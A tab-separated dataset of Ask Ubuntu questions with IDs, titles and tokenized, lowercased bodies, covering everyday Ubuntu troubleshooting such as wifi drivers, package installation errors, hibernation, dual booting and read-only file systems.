441080	ca n't enable wifi on ubuntu 12.04 dell inspiron 15	i am new to ubuntu and i know there were a lot of similar issues and i 've tried to follow some of the answers on the web ( e.g . dell inspiron wifi off or how do i get an atheros ar8162 working ? ) , but none of them are working , or are causing more errors along the way . recently i bought new dell inspiron 15 with installed ubuntu 12.04 on it , but there are no options were to connect to wifi . my router is working and all other devices are seeing it . here is some information that you might need for advice . i 'll be happy to provide anything further , please help me . $ iwconfig eth0 no wireless extensions . lo no wireless extensions . $ rfkill list all 2 : hci0 : bluetooth soft blocked : no hard blocked : no iwlist scan eth0 interface does n't support scanning . lo interface does n't support scanning . lspci | grep network 02:00.0 network controller : qualcomm atheros qca9565 / ar9565 wireless network adapter ( rev 01 ) sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 74:86:7a:4c:6c : b8 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.102 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:61 ioport:4000 ( size=256 ) memory : c0700000-c0700fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0600000-c067ffff memory:9fb00000-9fb0ffff lsmod | grep ath ath9k 133223 0 ath9k_common 14054 1 ath9k ath9k_hw 399752 2 ath9k , ath9k_common ath 24124 3 ath9k , ath9k_common , ath9k_hw dm_multipath 23306 0 scsi_dh 14589 1 dm_multipath ath3k 12918 0 mac80211 555318 2 ath9k , b43 bluetooth 212001 25 bnep , rfcomm , btusb , ath3k cfg80211 208382 4 ath9k , ath , b43 , mac80211 using these helped `sudo apt-get install linux-backports-modules-cw-3.10-precise-generic sudo modprobe ath9k ` but not for a long time . then i tried this advice and wifi works again : ca n't reach wi-fi signal on ubuntu , but can do it on other os/devices ( ath9k )
441081	unable to locate package while installing software	whenever i try to install ( any ) software using the terminal , the terminal is giving an output like : e : unable to locate package kindly help , as i am new to ubuntu 12.04
441084	how to know what libraries the `apt-get install` command installs [ and optionally , how to locate these files ] ?	i took for granted the apt-get install command for too long . how to know ( other than reading the prompt ) what files are being downloaded ? cuz i can read the prompt when i 'm installing these packages , but i wo n't remember in 4 months what i 've read . also , how to know where these files are being downloaded ?
441087	data lost due to installation of ubuntu	i was installing ubuntu 12.04 on my laptop . while installing it showed the partition menu , and i selected some options that were told to me by ubuntu users on ask ubuntu . i did the same , but i was n't sure about that , so i quit the installation process and restarted my laptop . i let windows start as normal , and then on opening my computer , i saw that all the drives ( hard disk d and e ) were gone . i had a lot of important data on them . what do i do now ? is the data gone ? i have a 64-bit os .
441089	start desktop manager when display turns on	i have a computer that serves as some kind of htpc . it 's running xubuntu ( 12.04 , will upgrade in spare time ) with xbmc . everything works great , except one thing . the computer is connected to a projector which will not turn itself on when computer starts . i like it ( and i 'm pretty sure most projectors work like that ) , because i can turn computer on headless , schedule some media download , use it as a nas or whatever else i want , and turn the projector just when i want to use it . unfortunately , the display server wo n't start without active display device and xubuntu does n't detect that some display became active - so , if i turn the computer and then , after some time , the projector , all i got is black screen . i would like to setup a solution that would detect that the projector is on , and then start desktop manager ( lightdm in my case ) . i know that i can add a task to cron that would try to start lightdm every minute , but i 'm pretty sure there 's a better solution . i 've already tried using ddccontrol , but it works only when desktop is running , so it 's of no use for me . as for technical details - the projector is connected via hdmi and the graphics card is tiny nvidia geforce 6150 le .
441090	printer issue canon pixma mg3510	i just bought a canon pixma mg3510 printer , and i ca n't get it to work . the system completed the setup and it sends the commands . the printer starts but it does n't print . i already tried the printer with windows . thanks .
441091	laptop fans go wild after waking from suspend 13.10	when my laptop wakes up from suspend the fans start running at 100 % . i 've look around all over the place but i ca n't find an answer . only a reboot fixes the problem . it is a hp probook 4510s i 've installed lm-sensors and this is the output when i run sensors . acpitz-virtual-0 adapter : virtual device temp1 : +16.0°c ( crit = +108.0°c ) temp2 : +26.0°c ( crit = +105.0°c ) temp3 : +32.0°c ( crit = +108.0°c ) temp4 : +37.0°c ( crit = +105.0°c ) temp5 : +20.0°c ( crit = +108.0°c ) temp6 : +90.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +30.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +31.0°c ( high = +105.0°c , crit = +105.0°c ) temp6 is showing 90 degrees even though it is n't , but it never goes down unless i reboot . i 'm not sure what temp6 is but i suspect it may be a motherboard sensor . edit i looked for suspicious activity in the system monitor , there was none .
441092	need help with sending audio from ubuntu inside linuxonandroid to android	i understand that this is not entirely a ubuntu question but it 's pretty darn near : ) . i 'm asking this question here since the linuxonandroid community is too small to get this solved within this century . i 'm trying to get this method of sending sound from ubuntu ( inside linux on android aka opensource complete linux installer ) to android to work : this method can make sound in ubuntu on android . youtube.com/watch ? feature=player_embedded & v=4wamu0h0-n0 this is a demo.a friend told me about this method.my device is new nexus 7 ( 2013 ) i will make a tutorial on xda-developers . make a audio server on android.and ubuntu send the voice to android.the audio server play the voice . this method is not real time , have delay.when play music , parse the music , it did n't parse immediately , go on play about 10 seconds , and when resume , the music is played from later seconds . 1.unzip the android file.7z , on android install the irb.apk file . run irb , then sdcard have a directory jruby , audioserver.12.rb put here . go to irb , find scripts , select audioserver.12.rb , and execute 2.in ubuntu : install socat and perl , use `` apt-get install socat `` and `` apt-get install perl '' 3.unzip asoundrc.7z , put .asoundrc into /root , in .asoundrc uncomment this line : pcm . ! default `` myfifo '' 4.unzip audiofifoloop.1.tar , put audiofifoloop somewhere , to allow multiple alsa applications , can configure audiofifoloop . find these two lines at the beginning : $ multi = 0 ; $ sleep = 1 ; set $ multi to 1 and $ sleep to 0. make it executeable , and run it then you can `` aplay *.wav '' in terminal , check is ok ? and can install smplayer to play music , make sure the audio driver select alsa . can play video in youtube but only html5.i played some but did n't smooth . android file.7z - forum.xda-developers.com/attachment.php ? attachmentid=2214234 & d=1377500530 audiofifoloop.1.tar - forum.xda-developers.com/attachment.php ? attachmentid=2214235 & d=1377500530 asoundrc.7z - forum.xda-developers.com/attachment.php ? attachmentid=2214263 & d=1377500955 taken from here : forum.xda-developers.com/showthread.php ? t=2420586 i have two problems , first when executing the audio server script it seems like i 'm getting an error that i do n't see in the guys tutorial video when he executes it ( but it 's hard to tell in the video cause it 's only visible for a second so i 'm not sure ) i.imgur.com/pckdnyc.png and then when i execute aplay a.wav i get shm_open ( ) failed : function not implemented so i need a person that understands ruby , ubuntu and who also has a android phone to tinker around with that can try this and see if he can get it to work cause i ca n't . if you are not familiar with linux on android you can read more about it here : play.google.com/store/apps/details ? id=com.zpwebsites.linuxonandroid if you do not have google play access then these are the programs needed to run ubuntu on android : skylink.dl.sourceforge.net/project/linuxonandroid/app/open_source_complete_linux_installer_28072013.apk android-vnc-viewer.googlecode.com/files/androidvnc_build20110327.apk jackpal.github.io/android-terminal-emulator/downloads/term.apk and the ubuntu image that i 'm using sourceforge.net/projects/linuxonandroid/files/ubuntu/12.04/small/ubuntu1204-v4-small.zip/download sorry for the httpstripped urls , i ca n't post urls since i just regged . many thanks to all .
441093	kubuntu 13.10 weird hibernate behavior	i 'm running kubuntu 13.10 on my laptop ( sony vaio vpceb1s1e ) and having weird problem with hibernate . after waking up my laptop from hibernate it looks like some stuff is restored but not all of it . for example it turns on all programs that were running before hibernation ( like chrome , console and so on ) but all of this programs have no state , so chrome for example do not remember any opened tabs - it 's like just started . console have no history , vpn is off and stuff like this . when i suspend to ram instead of hibernation everything works as expected . i 've checked my swap partition and it seems to work fine . i 've modified grub to include resume argument : grub_cmdline_linux_default= '' quiet splash resume=/dev/sda5 '' without any result . any suggestions what might cause the problem ? i have a 4gb ram , where my swap partition is 3,9gb might this cause such a problem ? ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 238,5g 0 disk ├─sda1 8:1 0 234,6g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 3,9g 0 part └─cryptswap1 ( dm-0 ) 252:0 0 3,9g 0 crypt [ swap ] i have almost nothing running while hibernating , system monitor shows 1,2 gib of 3,7 gib is used .
441100	data recovery from erased external hdd ntfs partion	i have erased my 1tb ntfs external hdd using startup disk creator accidentally . is there any possibility i can get back my data .
441106	files are not being sent to trash but being permanently deleted	when i booted my computer , i noticed : that the trash icon was missing from file manager ; this message when i tried to delete a file : are you sure that you want to permanently delete `` testfile '' ? if you delete a file , it is permanently lost . that i ca n't restore already deleted files to their previous locations . i can do it manually , but there is no restore feature i tired apt-get update , apt-get update , apt-get update -- fix-missing to try to repair anything broken . everything was working fine yesterday . however , i 've been working on a java project to send files to trash . i made it about a month ago , so i am not sure if it is relevant , but here is the test code : public class sendtotrashtest { public static void main ( string ... args ) { try { file f=new file ( `` test11 '' ) ; f.createnewfile ( ) ; sendtotrash ( f ) ; } catch ( ioexception e ) { // todo auto-generated catch block e.printstacktrace ( ) ; } } public static void sendtotrash ( file f ) { try { string s [ ] =f.getabsolutepath ( ) .split ( file.separator ) ; string basename=s [ s.length-1 ] , name=basename ; file trashinfofile=new file ( system.getproperty ( `` user.home '' ) + '' /.local/share/trash/info '' , name+ '' .trashinfo '' ) ; //handles duplicate files for ( int i=2 ; trashinfofile.exists ( ) ; i++ ) { name=basename+= '' . `` +i ; trashinfofile=new file ( system.getproperty ( `` user.home '' ) + '' /.local/share/trash/info '' , name+ '' .trashinfo '' ) ; } //moves file to trash file trashfile=new file ( system.getproperty ( `` user.home '' ) + '' /.local/share/trash/files '' , name ) ; files.move ( f.topath ( ) , trashfile.topath ( ) , standardcopyoption.replace_existing ) ; //creates trash info file which is used to restore the trash file dateformat dateformat = new simpledateformat ( `` yyyy-mm-dd hh : mm : ss '' ) ; calendar cal = calendar.getinstance ( ) ; trashinfofile.createnewfile ( ) ; printwriter out=new printwriter ( trashinfofile ) ; out.println ( `` [ trash info ] '' ) ; out.println ( `` path= '' +f.getabsolutepath ( ) ) ; //eg deletetion date : deletiondate=2014-03-01t23:38:18 out.println ( `` deletiondate= '' +dateformat.format ( cal.gettime ( ) ) .replace ( `` `` , `` t '' ) ) ; out.close ( ) ; } catch ( ioexception e ) { e.printstacktrace ( ) ; } } } i have no idea of how to fix my problem , so any help would be appreciated and thanks in advance .
441107	how to download ksirk skins ?	i want to download another skin for this risk game , but the button does n't work . is there is a command line for downloading and installing all the other maps ?
441108	multiple authentication errors	i have recently installed v12.04 , dual booted on xp netbook . it seems to be working ok , but several of the following appear in the authentication log ( on ksystem log ) . these messages followed a forced reboot because the machine had frozen . [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.69 '' ( uid=1000 pid=2114 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.20 '' ( uid=0 pid=1390 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) they are all very similar , the changes appearing in the various numbers . i have placed this query in the absolute beginners forum , so apologies for the repeat , but despite several views no solutions have been offered and i have been unable to find any answers anywhere . any help would be much appreciated
441109	software center wo n't start after interrupted installation	i was installing kingsoft office using a deb file . during installation the system hung and i was forced to switch off my laptop . now on restarting i am unable to start the software center . i tried so many things but always get this message : e : the package kingsoft-office : i386 needs to be reinstalled , but i ca n't find an archive for it . how can i fix this ?
441111	can i install ubuntu on computers and sell them ?	i want to sell second hand computers , i buy them cheap , upgrade them with parts from broken computers i get free and then sell them for a profit ( not much , about 20-30 âź profit ) . now , i used to install windows xp because almost all the pc 's i get , have an oem win xp licence with it . now support for windows xp is ending , it will be very hard to sell an win xp computer . am i allowed to install ubuntu on the machines and sell them with ubuntu and xp dualboot ?
441112	why ca n't i access this facebook game in ubuntu ?	can anyone please explain to me why i ca n't access this game using mozilla firefox on ubuntu ? https : //apps.facebook.com/livepool/ ? fb_source=bookmark & ref=bookmarks & count=0 & fb_bmpos=2_0
441113	qml listview is not scrollable ( if included within a row )	below code is using listview within a column and row . but the listview is not scrolable . any idea why ? import qtquick 2.0 import ubuntu.components 0.1 mainview { width : units.gu ( 60 ) height : units.gu ( 60 ) page { id : test column { spacing : units.gu ( 1 ) id : pagelayout anchors { margins : units.gu ( 2 ) fill : parent } row { id : buttonrow spacing : units.gu ( 1 ) button { objectname : `` button1 '' color : `` white '' text : i18n.tr ( `` help '' ) } button { objectname : `` button2 '' color : `` black '' text : i18n.tr ( `` search '' ) } } row { id : listarea spacing : units.gu ( 1 ) anchors.top : buttonrow.bottom height : mylist.count * units.gu ( 2 ) listmodel { id : fruitmodel listelement { name : `` apple '' cost : 2.45 } listelement { name : `` orange '' cost : 3.25 } listelement { name : `` banana '' cost : 1.95 } } listview { id : mylist anchors.fill : parent model : fruitmodel delegate : row { text { text : `` fruit : `` + name } text { text : `` cost : $ '' + cost } } } } } } }
441117	gtk+ website is not openning	official gtk+ website is not opening . i tried from two computers with different connections , aircel and bsnl both . but the result i am always getting : - connection refused : www.gtk.org:80 . if you can open this page please report and suggest . thanks .
441119	mount and unmount command line	i 've been trying to solve this problem but i ca n't still work it out . when i mount and unmount a device in graphic mode everything it 's fine and works as it should , but when i do the same trough the command line i do n't get the same result how can i make it work correctly ? ( get the same result )
441124	change shortcuts on gthumb	si there a way to change keyboard shortcuts on gthumb image viewer ? i have mouse with mouse 5 and 6 buttons ( the ones you click with a thumb ) is possible to change shortcuts somehow on gthumb so i can change image size like full size and fit screen with mouse buttons ? currently those shortcuts are assignes on keyboard button 1 for full image size , and i do n't know which one is for fit to window . but i would really like to change them to use with a mouse . i tried with this http : //hblok.net/blog/posts/2010/04/13/gconftool-2-xvkbd-custom-keyboard-shortcuts-in-any-application/ but it 's not working .
441128	will dd if=/image.iso of=/dev/sdb copy the image onto pendrive or burn it ?	or maybe i should just use unetbootin instead ( crying )
441132	i could browse files in nautilus on other hdd partitions before , but ca n't anymore . help !	i installed ubuntu 12.04 a few days back on my laptop alongside windows 7 . there was some problem during the installation and this corrupted the windows 7 boot loader . now i ca n't start windows , but ubuntu works pretty great . initially i could view the other windows partitions in nautilus ( c : , d : , etc . ) and i could view the files in them . ( i never tried accessing any , : ( ) . but now only home and file system are shown in nautilus . i ran this command : sudo lsblk -o name , size and it shows all the partitions correctly . so this means they exist . how do i get them to show up in nautilus ? i really need to access some of the files until i get windows up and running ( which might take a while ... ) . any help would be appreciated !
441133	remote desktop to window 7 and its vm ( is it possible )	i have a question related to remote desktop from windows 7 to a ubuntu server computer 1 : windows 7 installed + ubuntu server installed inside a virtual box computer 2 : windows 7 what i want to achieve are using remote desktop connecting from computer 2 to computer 1 : windows7 using remote desktop connecting from computer 2 to computer 1 : ubuntu server by using port forwarding and xrdp , i was able to achieve either one , but not both of them at the same time . for example , changing the port forwarding setting of port 3389 to ip address of windows7 or ubuntu server allows me to connect to one of them . however , changing the setting requires me to have a direct connection to my router , which is not possible when i am out of home . so , what setup is needed for connecting to them just by using different ports ? thanks .
441134	i want to install ubuntu in an ipad1 16 gb , and i 'm ready to follow your instructions	wifi , read pdf , print through wifi , openoffice . there are about 15 million tablets ipad1 sold , waiting for it .
441136	12.04 - > 13.10 trouble	i had 12.04 running decently , and decided to move to 13.10 . when running 13.10 off the usb it 's faster than 12.04 was , so i installed it over 12.04 . now that it 's installed , it 's slow . not `` it takes longer to open something '' slow , it 's `` running at 10 fps slow . '' any idea why or how to fix it ?
441151	i get an error when i try to compile dar on 12.04 , how can i fix solve this ?	install dar 2.4.12 from source because latest version ubuntu package is 2.4.2 . ./configure -- prefix=/usr dar and libdar have been successfully configured with the following parameters : libdar parameters : zlib compression ( gzip ) : yes libbz2 compression ( bzip2 ) : yes liblzo2 compression ( lzo ) : no strong encryption support : yes extended attributes support : no large files support ( > 2gb ) : yes ext2fs nodump flag support : no special allocation scheme : yes integer size used : infinint thread safe support : yes furtive read mode : yes large directory optim . : yes dar suite command line programs : long options available : yes building examples : no building dar_static : yes using upx at install : no building documentation : no finish : make sudo make destdir=/usr/bin install-strip dar -v dar : error while loading shared libraries : libdar.so.5000 : can not open shared object file : no such file or directory i need help ... upd : info about ubuntu package dar_2.4.2-1_i386.deb and my install log
441152	replace mint with ubuntu installation	i 'm new to linux and i 'm using linux mint petra but i want to install ubuntu 12 and i 'm stuck . i have all my data on secund partition ( images , videos , etc ) , and on the other is linux mint . if i choose replace linux mint with ubuntu does it deletes all my data on secund partition ?
441160	problem loading ubuntu installer from flash drive	using windows 7 ultimate 64-bit . downloaded ubuntu 13.10 to a usb thumb drive using universal usb installer . when i go to reboot my computer i can tell it 's trying to boot from the flash drive , but i get an error about `` no grldr '' and then it just boots into windows . any suggestions ? i 'm new to linux .
441161	how to permanently disable the f10 key ?	i have a problem with my laptop , that has a permanently stuck f10 key . is there any way to disable this key for both , text mode and x window system ? i found out , that in x system this can be realized with xmodmap , but when i open a new terminal in text mode , using ctrl+alt+f2 the f10 key is still active/stuck . is possible to disable this key for example in run level 3 for all user and for all text terminals ? -- thanks very much .
441162	chrome extension does n't work on ubuntu . dictionary.com	i had this extension when i was using chrome on windows . when i switched to ubuntu all extensions and apps synced automatically except this one . when i opened the chrome web store and went to this extension it says that i have it installed . i tried to uninstall and resinstall it but it does n't appear . it 's there on windows ! what 's wrong ? how is this possible ? this extension is my life saver . i really do n't like using google 's dictionary although i 've been using it for quite a while .
441163	ca n't boot ubuntu 12.04 with windows 7 installed in toshiba portege laptop	i downloaded ubuntu 12.04 , try to boot it using usb , i did download the .iso , i did put it into the usb . i 'm using toshiba portege , forgot which one . when i 'm open the bios with f2 , i ca n't boot it with usb , the laptop does n't show the option to boot via usb . the laptop is n't old enough , i think it can boot via usb . but it does n't show any option . i know this is a stupid question . but , can anyone help me ? thanks .
441165	i boot up normally and then i get to the login screen after i put my longin pass the	screen freezes and goes to a blank purple screen i rebooted at-least 5 times and it steel happens so i go into im not really sure but like repair mode and i repair broken packages then i boot it normal after that everything is fine but when i login my screen resolution is 1024 x 768 when its supposed to be 1600 x 900
441166	debian and ubuntu on the same machine	how can i install debian and ubuntu on the same machine , i mean multi-boot , i 've tried to install debian after ubuntu and there were grub problems , also i do n't know can two `` different '' linux systems use same swap ?
441167	could n't open output file : read-only file system	i just installed ubuntu . my problem is i am attempting to write a log file to home . i am using logcat from a python module called adb . when i attempt the terminal command adb logcat -f < path > i should be able to output this log to a text file on my hard drive , but instead i get the error : could n't open output file : read-only file system this is despite attempting the command sudo adb logcat -f < path > . for < path > i have mainly been trying just 'log ' and 'log.txt' i am able to write files to disk using cat > and i can save files without issue . i have read that this can be caused by a failing hard disk , but up until now i have n't seen any other evidence of this . any help in understanding why this is happening and how to overcome it would be greatly appreciated . in case anyone is wondering , it is necessary for me to output this file to disk . edit : i should mention that i did in fact have a problem with my swap partition . i was getting an error to the tune of /dev/mapper/cryptswap1 is not ready yet or not present ( not exact wording ) on the splash screen during boot , but i reformatted and made a new swap partition which got rid of the error . however , both before seeing to the problem , and still now , gparted labels the swap partition as 'unknown ' . free -m shows no issues , nor does swapon -s edit : output of sudo mount /dev/sda5 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda7 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) /home/me/.private on /home/me type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=cbb0ed41b9f457c5 , ecryptfs_fnek_sig=9e985b7d47d6e940 ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=me ) output of apt-cache policy 'sytemd* ' : version table : *** 204-0ubuntu19.1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 100 /var/lib/dpkg/status 204-0ubuntu18 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages root-system-bin : installed : ( none ) candidate : 5.34.09-1 version table : 5.34.09-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libboost-filesystem1.50-dev : installed : ( none ) candidate : ( none ) version table : libmono-system-data4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-runtime4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-windows-forms4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qemu-system-or32 : installed : ( none ) candidate : ( none ) version table : xen-system : installed : ( none ) candidate : ( none ) version table : libmono-system2.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libsystemu-ruby1.8 : installed : ( none ) candidate : 2.5.1-1 version table : 2.5.1-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages system-image-dev : installed : ( none ) candidate : 1.9.1-0ubuntu1 version table : 1.9.1-0ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libsystemsettings1 : installed : ( none ) candidate : 0.1+13.10.20131015.2-0ubuntu1 version table : 0.1+13.10.20131015.2-0ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages xen-linux-system-686-pae : installed : ( none ) candidate : ( none ) version table : libmono-system-data-linq4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages ubuntu-system-service : installed : 0.2.5 candidate : 0.2.5 version table : *** 0.2.5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status qemu-system-s390x : installed : ( none ) candidate : ( none ) version table : libboost-filesystem1.53.0 : installed : ( none ) candidate : 1.53.0-6+exp3ubuntu8 version table : 1.53.0-6+exp3ubuntu8 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-runtime-serialization4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qemu-system-ppcemb : installed : ( none ) candidate : ( none ) version table : libmono-system-ldap4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages systemc : installed : ( none ) candidate : ( none ) version table : system-config-printer : installed : ( none ) candidate : ( none ) version table : systemd : installed : ( none ) candidate : ( none ) version table : qemu-system-sh4 : installed : ( none ) candidate : ( none ) version table : xen-linux-system-amd64 : installed : ( none ) candidate : ( none ) version table : qemu-system-xtensa : installed : ( none ) candidate : ( none ) version table : libmono-system-transactions4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libghc-system-fileio-prof-0.3.10-17c22 : installed : ( none ) candidate : ( none ) version table : libmono-system-windows-forms-datavisualization4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libghc-system-filepath-prof : installed : ( none ) candidate : 0.4.7-2build1 version table : 0.4.7-2build1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libqtsysteminfo1 : installed : ( none ) candidate : 1.2.0-3ubuntu5 version table : 1.2.0-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages system-tools-backends-dev : installed : ( none ) candidate : 2.10.2-1ubuntu1 version table : 2.10.2-1ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libboost-system1.52-dev : installed : ( none ) candidate : ( none ) version table : system-config-samba : installed : ( none ) candidate : 1.2.63-0ubuntu5 version table : 1.2.63-0ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages libmono-system-security4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libboost-filesystem1.46-dev : installed : ( none ) candidate : ( none ) version table : libghc-filesystem-conduit-doc : installed : ( none ) candidate : 1.0.0-2build1 version table : 1.0.0-2build1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages root-system-common : installed : ( none ) candidate : 5.34.09-1 version table : 5.34.09-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages system-config-printer-gnome : installed : 1.4.2+20130920-0ubuntu1.2 candidate : 1.4.2+20130920-0ubuntu1.2 version table : *** 1.4.2+20130920-0ubuntu1.2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 100 /var/lib/dpkg/status 1.4.2+20130920-0ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-servicemodel-routing4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages qemu-system-ppc64 : installed : ( none ) candidate : ( none ) version table : libmono-system-web-abstractions4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libmono-system-xaml4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages liblua5.1-filesystem0 : installed : ( none ) candidate : 1.5.0+16+g84f1af5-1 version table : 1.5.0+16+g84f1af5-1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages system-tools-backends : installed : ( none ) candidate : 2.10.2-1ubuntu1 version table : 2.10.2-1ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages qemu-system-x86 : installed : ( none ) candidate : 1.5.0+dfsg-3ubuntu5.3 version table : 1.5.0+dfsg-3ubuntu5.3 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 1.5.0+dfsg-3ubuntu5 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages system-config-printer-kde : installed : ( none ) candidate : ( none ) version table : init-system-helpers : installed : 1.7 candidate : 1.7 version table : *** 1.7 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status systemd-shim : installed : 6-0ubuntu0.13.10 candidate : 6-0ubuntu0.13.10 version table : *** 6-0ubuntu0.13.10 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 100 /var/lib/dpkg/status 3+real-0ubuntu1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libghc-system-fileio-doc : installed : ( none ) candidate : 0.3.10-2build1 version table : 0.3.10-2build1 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/universe amd64 packages systemtap-grapher : installed : ( none ) candidate : ( none ) version table : libmono-system-enterpriseservices4.0-cil : installed : ( none ) candidate : 2.10.8.1-5ubuntu2 version table : 2.10.8.1-5ubuntu2 0 500 http : //ie.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages libghc-system-filepath-dev-0.4.7-c7b27 : installed : ( none ) candidate : ( none ) version table : qemu-system-x86-64 : installed : ( none ) candidate : ( none ) version table : system-config-printer-udev : installed : 1.4.2+20130920-0ubuntu1.2 candidate : 1.4.2+20130920-0ubuntu1.2 version table : *** 1.4.2+20130920-0ubuntu1.2 0 500 http : 